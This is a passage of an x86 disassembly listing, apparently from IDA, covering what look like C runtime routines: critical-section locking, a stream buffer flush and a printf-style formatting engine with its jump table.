loc_42DA6C: ; CODE XREF: sub_42DA1D+59�j
cmp eax, esi
jnb short loc_42DA7A
cmp byte ptr [eax], 0
jnz short loc_42DA78
inc eax
jmp short loc_42DA6C
; ---------------------------------------------------------------------------
loc_42DA78: ; CODE XREF: sub_42DA1D+56�j
cmp eax, esi
loc_42DA7A: ; CODE XREF: sub_42DA1D+51�j
jnz short loc_42DABE
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_42DAB2
cmp esi, eax
jbe short loc_42DAB2
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_42DAA9
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_42DAA4
loc_42DA9D: ; CODE XREF: sub_42DA1D+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_42DA9D
loc_42DAA4: ; CODE XREF: sub_42DA1D+7E�j
mov [ebx+4], eax
jmp short loc_42DAB2
; ---------------------------------------------------------------------------
loc_42DAA9: ; CODE XREF: sub_42DA1D+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_42DAB2: ; CODE XREF: sub_42DA1D+68�j
; sub_42DA1D+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_42DAB7: ; CODE XREF: sub_42DA1D+38�j
mov [ebp+var_4], 1
loc_42DABE: ; CODE XREF: sub_42DA1D:loc_42DA57�j
; sub_42DA1D+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_42DA1D endp
; =============== S U B R O U T I N E =======================================
sub_42DAC6 proc near ; CODE XREF: sub_42E487+1�p
push esi
mov esi, dword_437158
push off_4531BC
call esi ; dword_437158
push off_4531AC
call esi ; dword_437158
push off_45319C
call esi ; dword_437158
push off_45317C
call esi ; dword_437158
pop esi
retn
sub_42DAC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DAEF proc near ; CODE XREF: sub_4297F6+3E�p
; sub_4297F6+94�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
cmp dword_453178[eax*4], 0
lea esi, ds:453178h[eax*4]
jnz short loc_42DB45
push edi
push 18h
call sub_4297B8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42DB1E
push 11h
call sub_42C67C
pop ecx
loc_42DB1E: ; CODE XREF: sub_42DAEF+25�j
push 11h
call sub_42DAEF
cmp dword ptr [esi], 0
pop ecx
push edi
jnz short loc_42DB36
call dword_437158 ; InitializeCriticalSection
mov [esi], edi
jmp short loc_42DB3C
; ---------------------------------------------------------------------------
loc_42DB36: ; CODE XREF: sub_42DAEF+3B�j
call sub_4298F2
pop ecx
loc_42DB3C: ; CODE XREF: sub_42DAEF+45�j
push 11h
call sub_42DB50
pop ecx
pop edi
loc_42DB45: ; CODE XREF: sub_42DAEF+16�j
push dword ptr [esi]
call dword_4370CC ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_42DAEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DB50 proc near ; CODE XREF: sub_42985D+2�p
; sub_4298BC+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_453178[eax*4]
call dword_437164 ; RtlLeaveCriticalSection
pop ebp
retn
sub_42DB50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DB65 proc near ; CODE XREF: sub_429B03+46�p
; sub_429BBE+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_42DC71
test al, 40h
jnz loc_42DC71
test al, 1
jz short loc_42DB9D
and dword ptr [esi+4], 0
test al, 10h
jz loc_42DC71
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_42DB9D: ; CODE XREF: sub_42DB65+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_42DBD7
cmp esi, offset dword_450EE0
jz short loc_42DBC5
cmp esi, offset dword_450F00
jnz short loc_42DBD0
loc_42DBC5: ; CODE XREF: sub_42DB65+56�j
push ebx
call sub_433237
test eax, eax
pop ecx
jnz short loc_42DBD7
loc_42DBD0: ; CODE XREF: sub_42DB65+5E�j
push esi
call sub_4331F3
pop ecx
loc_42DBD7: ; CODE XREF: sub_42DB65+4E�j
; sub_42DB65+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_42DC47
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_42DC07
push edi
push eax
push ebx
call sub_43249C
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_42DC3D
; ---------------------------------------------------------------------------
loc_42DC07: ; CODE XREF: sub_42DB65+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_42DC25
mov ecx, ebx
mov eax, ebx
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_42DC2A
; ---------------------------------------------------------------------------
loc_42DC25: ; CODE XREF: sub_42DB65+A5�j
mov eax, offset dword_4535D0
loc_42DC2A: ; CODE XREF: sub_42DB65+BE�j
test byte ptr [eax+4], 20h
jz short loc_42DC3D
push 2
push 0
push ebx
call sub_42F8B8
add esp, 0Ch
loc_42DC3D: ; CODE XREF: sub_42DB65+A0�j
; sub_42DB65+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_42DC5B
; ---------------------------------------------------------------------------
loc_42DC47: ; CODE XREF: sub_42DB65+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_43249C
add esp, 0Ch
mov [ebp+arg_4], eax
loc_42DC5B: ; CODE XREF: sub_42DB65+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_42DC67
or dword ptr [esi+0Ch], 20h
jmp short loc_42DC76
; ---------------------------------------------------------------------------
loc_42DC67: ; CODE XREF: sub_42DB65+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_42DC79
; ---------------------------------------------------------------------------
loc_42DC71: ; CODE XREF: sub_42DB65+10�j
; sub_42DB65+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_42DC76: ; CODE XREF: sub_42DB65+100�j
or eax, 0FFFFFFFFh
loc_42DC79: ; CODE XREF: sub_42DB65+10A�j
pop esi
pop ebx
pop ebp
retn
sub_42DB65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DC7D proc near ; CODE XREF: sub_429B03+29�p
; sub_429BBE+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_42E396
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_42DCB1
; ---------------------------------------------------------------------------
loc_42DCA9: ; CODE XREF: sub_42DC7D+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_42DCB1: ; CODE XREF: sub_42DC7D+2A�j
cmp [ebp+var_14], edx
jl loc_42E396
cmp bl, 20h
jl short loc_42DCD2
cmp bl, 78h
jg short loc_42DCD2
movsx eax, bl
mov al, [eax+4374DCh]
and eax, 0Fh
jmp short loc_42DCD4
; ---------------------------------------------------------------------------
loc_42DCD2: ; CODE XREF: sub_42DC7D+40�j
; sub_42DC7D+45�j
xor eax, eax
loc_42DCD4: ; CODE XREF: sub_42DC7D+53�j
movsx eax, byte_4374FC[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_42E385 ; default
jmp off_42E39E[eax*4] ; switch jump
loc_42DCF2: ; DATA XREF: .text:off_42E39E�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0042DCEB case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD0D: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
movsx eax, bl ; jumptable 0042DCEB case 2
sub eax, 20h
jz short loc_42DD50
sub eax, 3
jz short loc_42DD47
sub eax, 8
jz short loc_42DD3E
dec eax
dec eax
jz short loc_42DD35
sub eax, 3
jnz loc_42E385 ; default
or [ebp+var_4], 8
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD35: ; CODE XREF: sub_42DC7D+A4�j
or [ebp+var_4], 4
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD3E: ; CODE XREF: sub_42DC7D+A0�j
or [ebp+var_4], 1
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD47: ; CODE XREF: sub_42DC7D+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD50: ; CODE XREF: sub_42DC7D+96�j
or [ebp+var_4], 2
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD59: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
cmp bl, 2Ah ; jumptable 0042DCEB case 3
jnz short loc_42DD81
lea eax, [ebp+arg_8]
push eax
call sub_42E45C
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_42E385 ; default
or [ebp+var_4], 4
neg eax
loc_42DD79: ; CODE XREF: sub_42DC7D+111�j
mov [ebp+var_20], eax
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD81: ; CODE XREF: sub_42DC7D+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_42DD79
; ---------------------------------------------------------------------------
loc_42DD90: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
mov [ebp+var_10], edx ; jumptable 0042DCEB case 4
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DD98: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
cmp bl, 2Ah ; jumptable 0042DCEB case 5
jnz short loc_42DDBB
lea eax, [ebp+arg_8]
push eax
call sub_42E45C
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_42E385 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DDBB: ; CODE XREF: sub_42DC7D+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DDCD: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
cmp bl, 49h ; jumptable 0042DCEB case 6
jz short loc_42DE00
cmp bl, 68h
jz short loc_42DDF7
cmp bl, 6Ch
jz short loc_42DDEE
cmp bl, 77h
jnz loc_42E385 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DDEE: ; CODE XREF: sub_42DC7D+15D�j
or [ebp+var_4], 10h
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DDF7: ; CODE XREF: sub_42DC7D+158�j
or [ebp+var_4], 20h
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DE00: ; CODE XREF: sub_42DC7D+153�j
cmp byte ptr [edi], 36h
jnz short loc_42DE19
cmp byte ptr [edi+1], 34h
jnz short loc_42DE19
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DE19: ; CODE XREF: sub_42DC7D+186�j
; sub_42DC7D+18C�j
mov [ebp+var_30], edx
loc_42DE1C: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
mov ecx, off_4533B8 ; jumptable 0042DCEB case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42DE48
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_42E3BE
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_42DE48: ; CODE XREF: sub_42DC7D+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_42E3BE
add esp, 0Ch
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42DE60: ; CODE XREF: sub_42DC7D+6E�j
; DATA XREF: .text:off_42E39E�o
movsx eax, bl ; jumptable 0042DCEB case 7
cmp eax, 67h
jg loc_42E088
cmp eax, 65h
jge loc_42DF0B
cmp eax, 58h
jg loc_42DF69
jz loc_42E0FC
sub eax, 43h
jz loc_42DF2C
dec eax
dec eax
jz short loc_42DF01
dec eax
dec eax
jz short loc_42DF01
sub eax, 0Ch
jnz loc_42E287
test word ptr [ebp+var_4], 830h
jnz short loc_42DEAA
or byte ptr [ebp+var_4+1], 8
loc_42DEAA: ; CODE XREF: sub_42DC7D+227�j
; sub_42DC7D+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_42DEB7
mov esi, 7FFFFFFFh
loc_42DEB7: ; CODE XREF: sub_42DC7D+233�j
lea eax, [ebp+arg_8]
push eax
call sub_42E45C
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_42E0D0
test ecx, ecx
jnz short loc_42DEDF
mov ecx, off_45323C
mov [ebp+var_8], ecx
loc_42DEDF: ; CODE XREF: sub_42DC7D+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_42DEE8: ; CODE XREF: sub_42DC7D+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_42E0C7
cmp word ptr [eax], 0
jz loc_42E0C7
inc eax
inc eax
jmp short loc_42DEE8
; ---------------------------------------------------------------------------
loc_42DF01: ; CODE XREF: sub_42DC7D+212�j
; sub_42DC7D+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_42DF0B: ; CODE XREF: sub_42DC7D+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_42DFEF
mov [ebp+var_10], 6
jmp loc_42DFFD
; ---------------------------------------------------------------------------
loc_42DF2C: ; CODE XREF: sub_42DC7D+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_42DF38
or byte ptr [ebp+var_4+1], 8
loc_42DF38: ; CODE XREF: sub_42DC7D+2B5�j
; sub_42DC7D+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_42DF7F
call sub_42E479
push eax
lea eax, [ebp+var_248]
push eax
call sub_433260
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_42DF92
mov [ebp+var_28], 1
jmp short loc_42DF92
; ---------------------------------------------------------------------------
loc_42DF69: ; CODE XREF: sub_42DC7D+1FB�j
sub eax, 5Ah
jz short loc_42DFA0
sub eax, 9
jz short loc_42DF38
dec eax
jz loc_42E162
jmp loc_42E287
; ---------------------------------------------------------------------------
loc_42DF7F: ; CODE XREF: sub_42DC7D+2C5�j
call sub_42E45C
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_42DF92: ; CODE XREF: sub_42DC7D+2E1�j
; sub_42DC7D+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_42E287
; ---------------------------------------------------------------------------
loc_42DFA0: ; CODE XREF: sub_42DC7D+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_42E45C
test eax, eax
pop ecx
jz short loc_42DFE1
mov ecx, [eax+4]
test ecx, ecx
jz short loc_42DFE1
test byte ptr [ebp+var_4+1], 8
jz short loc_42DFD2
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_42E287
; ---------------------------------------------------------------------------
loc_42DFD2: ; CODE XREF: sub_42DC7D+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_42E284
; ---------------------------------------------------------------------------
loc_42DFE1: ; CODE XREF: sub_42DC7D+32F�j
; sub_42DC7D+336�j
mov eax, off_453238
mov [ebp+var_8], eax
push eax
jmp loc_42E07D
; ---------------------------------------------------------------------------
loc_42DFEF: ; CODE XREF: sub_42DC7D+29D�j
jnz short loc_42DFFD
cmp bl, 67h
jnz short loc_42DFFD
mov [ebp+var_10], 1
loc_42DFFD: ; CODE XREF: sub_42DC7D+2AA�j
; sub_42DC7D:loc_42DFEF�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_45381C
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_42E04F
cmp [ebp+var_10], 0
jnz short loc_42E04F
lea eax, [ebp+var_248]
push eax
call off_453828
pop ecx
loc_42E04F: ; CODE XREF: sub_42DC7D+3BC�j
; sub_42DC7D+3C2�j
cmp bl, 67h
jnz short loc_42E066
test esi, esi
jnz short loc_42E066
lea eax, [ebp+var_248]
push eax
call off_453820
pop ecx
loc_42E066: ; CODE XREF: sub_42DC7D+3D5�j
; sub_42DC7D+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_42E07C
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_42E07C: ; CODE XREF: sub_42DC7D+3F0�j
push edi
loc_42E07D: ; CODE XREF: sub_42DC7D+36D�j
call sub_4293A0
pop ecx
jmp loc_42E284
; ---------------------------------------------------------------------------
loc_42E088: ; CODE XREF: sub_42DC7D+1E9�j
sub eax, 69h
jz loc_42E162
sub eax, 5
jz loc_42E138
dec eax
jz loc_42E125
dec eax
jz short loc_42E0F5
sub eax, 3
jz loc_42DEAA
dec eax
dec eax
jz loc_42E166
sub eax, 3
jnz loc_42E287
mov [ebp+var_2C], 27h
jmp short loc_42E103
; ---------------------------------------------------------------------------
loc_42E0C7: ; CODE XREF: sub_42DC7D+270�j
; sub_42DC7D+27A�j
sub eax, ecx
sar eax, 1
jmp loc_42E284
; ---------------------------------------------------------------------------
loc_42E0D0: ; CODE XREF: sub_42DC7D+24F�j
test ecx, ecx
jnz short loc_42E0DD
mov ecx, off_453238
mov [ebp+var_8], ecx
loc_42E0DD: ; CODE XREF: sub_42DC7D+455�j
mov eax, ecx
loc_42E0DF: ; CODE XREF: sub_42DC7D+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_42E0EE
cmp byte ptr [eax], 0
jz short loc_42E0EE
inc eax
jmp short loc_42E0DF
; ---------------------------------------------------------------------------
loc_42E0EE: ; CODE XREF: sub_42DC7D+467�j
; sub_42DC7D+46C�j
sub eax, ecx
jmp loc_42E284
; ---------------------------------------------------------------------------
loc_42E0F5: ; CODE XREF: sub_42DC7D+425�j
mov [ebp+var_10], 8
loc_42E0FC: ; CODE XREF: sub_42DC7D+201�j
mov [ebp+var_2C], 7
loc_42E103: ; CODE XREF: sub_42DC7D+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_42E16D
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_42E16D
; ---------------------------------------------------------------------------
loc_42E125: ; CODE XREF: sub_42DC7D+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_42E16D
or byte ptr [ebp+var_4+1], 2
jmp short loc_42E16D
; ---------------------------------------------------------------------------
loc_42E138: ; CODE XREF: sub_42DC7D+417�j
lea eax, [ebp+arg_8]
push eax
call sub_42E45C
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_42E151
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_42E156
; ---------------------------------------------------------------------------
loc_42E151: ; CODE XREF: sub_42DC7D+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_42E156: ; CODE XREF: sub_42DC7D+4D2�j
mov [ebp+var_28], 1
jmp loc_42E385 ; default
; ---------------------------------------------------------------------------
loc_42E162: ; CODE XREF: sub_42DC7D+2F7�j
; sub_42DC7D+40E�j
or [ebp+var_4], 40h
loc_42E166: ; CODE XREF: sub_42DC7D+432�j
mov [ebp+var_C], 0Ah
loc_42E16D: ; CODE XREF: sub_42DC7D+491�j
; sub_42DC7D+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_42E17F
lea eax, [ebp+arg_8]
push eax
call sub_42E469
pop ecx
jmp short loc_42E1C0
; ---------------------------------------------------------------------------
loc_42E17F: ; CODE XREF: sub_42DC7D+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_42E1A6
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42E19B
call sub_42E45C
pop ecx
movsx eax, ax
loc_42E198: ; CODE XREF: sub_42DC7D+527�j
; sub_42DC7D+539�j
cdq
jmp short loc_42E1C0
; ---------------------------------------------------------------------------
loc_42E19B: ; CODE XREF: sub_42DC7D+510�j
call sub_42E45C
pop ecx
movzx eax, ax
jmp short loc_42E198
; ---------------------------------------------------------------------------
loc_42E1A6: ; CODE XREF: sub_42DC7D+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42E1B8
call sub_42E45C
pop ecx
jmp short loc_42E198
; ---------------------------------------------------------------------------
loc_42E1B8: ; CODE XREF: sub_42DC7D+531�j
call sub_42E45C
pop ecx
xor edx, edx
loc_42E1C0: ; CODE XREF: sub_42DC7D+500�j
; sub_42DC7D+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_42E1E1
test edx, edx
jg short loc_42E1E1
jl short loc_42E1D0
test eax, eax
jnb short loc_42E1E1
loc_42E1D0: ; CODE XREF: sub_42DC7D+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_42E1E5
; ---------------------------------------------------------------------------
loc_42E1E1: ; CODE XREF: sub_42DC7D+547�j
; sub_42DC7D+54B�j ...
mov esi, eax
mov edi, edx
loc_42E1E5: ; CODE XREF: sub_42DC7D+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_42E1EE
and edi, 0
loc_42E1EE: ; CODE XREF: sub_42DC7D+56C�j
cmp [ebp+var_10], 0
jge short loc_42E1FD
mov [ebp+var_10], 1
jmp short loc_42E201
; ---------------------------------------------------------------------------
loc_42E1FD: ; CODE XREF: sub_42DC7D+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_42E201: ; CODE XREF: sub_42DC7D+57E�j
mov eax, esi
or eax, edi
jnz short loc_42E20B
and [ebp+var_1C], 0
loc_42E20B: ; CODE XREF: sub_42DC7D+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_42E211: ; CODE XREF: sub_42DC7D+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_42E221
mov eax, esi
or eax, edi
jz short loc_42E25C
loc_42E221: ; CODE XREF: sub_42DC7D+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_42BDD0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_42BE50
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_42E252
add ebx, [ebp+var_2C]
loc_42E252: ; CODE XREF: sub_42DC7D+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_42E211
; ---------------------------------------------------------------------------
loc_42E25C: ; CODE XREF: sub_42DC7D+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_42E287
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_42E27A
test eax, eax
jnz short loc_42E287
loc_42E27A: ; CODE XREF: sub_42DC7D+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_42E284: ; CODE XREF: sub_42DC7D+35F�j
; sub_42DC7D+406�j ...
mov [ebp+var_C], eax
loc_42E287: ; CODE XREF: sub_42DC7D+21B�j
; sub_42DC7D+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_42E385 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_42E2BF
test bh, 1
jz short loc_42E2A4
mov [ebp+var_16], 2Dh
jmp short loc_42E2B8
; ---------------------------------------------------------------------------
loc_42E2A4: ; CODE XREF: sub_42DC7D+61F�j
test bl, 1
jz short loc_42E2AF
mov [ebp+var_16], 2Bh
jmp short loc_42E2B8
; ---------------------------------------------------------------------------
loc_42E2AF: ; CODE XREF: sub_42DC7D+62A�j
test bl, 2
jz short loc_42E2BF
mov [ebp+var_16], 20h
loc_42E2B8: ; CODE XREF: sub_42DC7D+625�j
; sub_42DC7D+630�j
mov [ebp+var_1C], 1
loc_42E2BF: ; CODE XREF: sub_42DC7D+61A�j
; sub_42DC7D+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_42E2DF
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_42E3F3
add esp, 10h
loc_42E2DF: ; CODE XREF: sub_42DC7D+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_42E424
add esp, 10h
test bl, 8
jz short loc_42E311
test bl, 4
jnz short loc_42E311
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_42E3F3
add esp, 10h
loc_42E311: ; CODE XREF: sub_42DC7D+67B�j
; sub_42DC7D+680�j
cmp [ebp+var_24], 0
jz short loc_42E358
cmp [ebp+var_C], 0
jle short loc_42E358
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_42E326: ; CODE XREF: sub_42DC7D+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_433260
pop ecx
test eax, eax
pop ecx
jle short loc_42E36D
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_42E424
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_42E326
jmp short loc_42E36D
; ---------------------------------------------------------------------------
loc_42E358: ; CODE XREF: sub_42DC7D+698�j
; sub_42DC7D+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_42E424
add esp, 10h
loc_42E36D: ; CODE XREF: sub_42DC7D+6BC�j
; sub_42DC7D+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_42E385 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_42E3F3
add esp, 10h
loc_42E385: ; CODE XREF: sub_42DC7D+68�j
; sub_42DC7D+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_42DCA9
loc_42E396: ; CODE XREF: sub_42DC7D+1F�j
; sub_42DC7D+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_42DC7D endp
; ---------------------------------------------------------------------------
off_42E39E dd offset loc_42DE1C ; DATA XREF: sub_42DC7D+6E�r
dd offset loc_42DCF2 ; jump table for switch statement
dd offset loc_42DD0D
dd offset loc_42DD59
dd offset loc_42DD90
dd offset loc_42DD98
dd offset loc_42DDCD
dd offset loc_42DE60
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E3BE proc near ; CODE XREF: sub_42DC7D+1BD�p
; sub_42DC7D+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
